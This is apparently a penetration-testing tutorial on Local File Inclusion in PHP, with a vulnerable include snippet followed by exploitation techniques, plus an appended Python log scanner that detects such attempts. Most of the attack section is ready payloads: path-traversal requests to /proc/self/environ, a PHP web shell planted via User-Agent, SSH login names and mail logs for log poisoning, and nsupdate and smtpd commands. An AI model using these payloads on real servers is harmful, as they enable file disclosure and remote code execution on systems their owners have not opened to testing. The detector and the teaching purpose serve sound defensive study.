An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even XSS.
Typically, LFI occurs when an application builds a file path from user input. If the application treats that input as trusted, an attacker-chosen local file ends up in the include statement.
Check for LFI
The following is an example of PHP code that is vulnerable to LFI.
/**
 * Get the filename from a GET input
 * Example - http://example.com/?file=filename.php
 */
$file = $_GET['file'];

/**
 * Unsafely include the file
 * Example - filename.php
 */
include('directory/' . $file);
The PHP filter wrapper is used to read .php files. A PHP file's source cannot be read through a plain include, because the file is executed rather than displayed. The PHP filter wrapper makes the server return the file's content in another encoding, such as base64 or ROT13, so the source is shown instead of run.
Via /proc/self/environ
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
Via Apache Log Files
# /var/log/apache2/access.log
# Put a PHP shell in the User-Agent header or in a GET parameter, for example:
<?php system($_GET['cmd']); ?>
# The same works with /proc/self/environ
Via SSH
ssh '<?php system($_GET["cmd"]); ?>'@10.10.10.10
# Then include the SSH log file through the web application:
# http://example.com/index.php?page=/var/log/auth.log&cmd=id
Via Mail
First send an email through the open SMTP service, then include the mail log file (/var/log/mail) through the web application, e.g. http://example.com/index.php?page=/var/log/mail.
nsupdate
> server $ip_target $port_dns_target
> key $key_algorithm:$name_key $secret
> zone $dns_name
> update add mail.$target_domain 86400 A $ip_host
> send

# Start a Python smtpd server to receive the mail (note: the smtpd module was removed in Python 3.12)
python3 -m smtpd -c DebuggingServer -n $ip_host:25
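As an added defensive example (not part of the original page), the following Python scans constructed Apache access-log lines for the traces the techniques above leave behind: path traversal (including URL-encoded and double-encoded forms), includes of /proc/self/environ or log files, the PHP filter wrapper, and PHP tags planted in a parameter or User-Agent for log poisoning. The log format, the indicator regexes and the sample lines are assumptions of this example, not taken from the page.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache combined log format: ip - - [time] "METHOD target PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Indicators drawn from the techniques above: traversal, the files they include,
# the PHP filter wrapper, and PHP tags planted in a parameter or header for log poisoning.
PHP_TAG = re.compile(r'<\?(?:php|=)', re.I)
CHECKS = [
    ("traversal", re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')),
    ("sensitive path", re.compile(r'/proc/self/environ|/var/log/|/etc/passwd', re.I)),
    ("php wrapper", re.compile(r'^php://', re.I)),
    ("php tag", PHP_TAG),
]

def decode(value, rounds=2):
    """URL-decode repeatedly so %2e%2e%2f and double-encoded payloads are normalised."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value

def analyze_line(line):
    """Return the findings for one access-log line; an empty list means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed line"]
    findings = []
    for name, raw in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        val = decode(raw)  # parse_qsl decoded once already; this strips extra layers
        findings += [f"{label} in {name}" for label, rx in CHECKS if rx.search(val)]
    if PHP_TAG.search(decode(m["ua"])):
        findings.append("php tag in user-agent (log poisoning attempt)")
    return findings

def scan(lines):
    """Map 1-based line numbers to findings, keeping only suspicious lines."""
    return {n: f for n, l in enumerate(lines, 1) if (f := analyze_line(l))}

# Constructed sample lines (not real traffic): one benign request and three LFI attempts.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=../../../proc/self/environ HTTP/1.1" 200 2048 "-" "<?=phpinfo(); ?>"',
    '10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?page=%252e%252e%252fvar/log/auth.log&cmd=id HTTP/1.1" 200 900 "-" "curl/8.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:42 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 700 "-" "curl/8.0"',
]
```

Run `scan(SAMPLE_LOG)` to get the three flagged lines; in practice feed it the web server's access log and alert on any non-empty result, remembering that the poisoned User-Agent only matters if the application can be made to include that log.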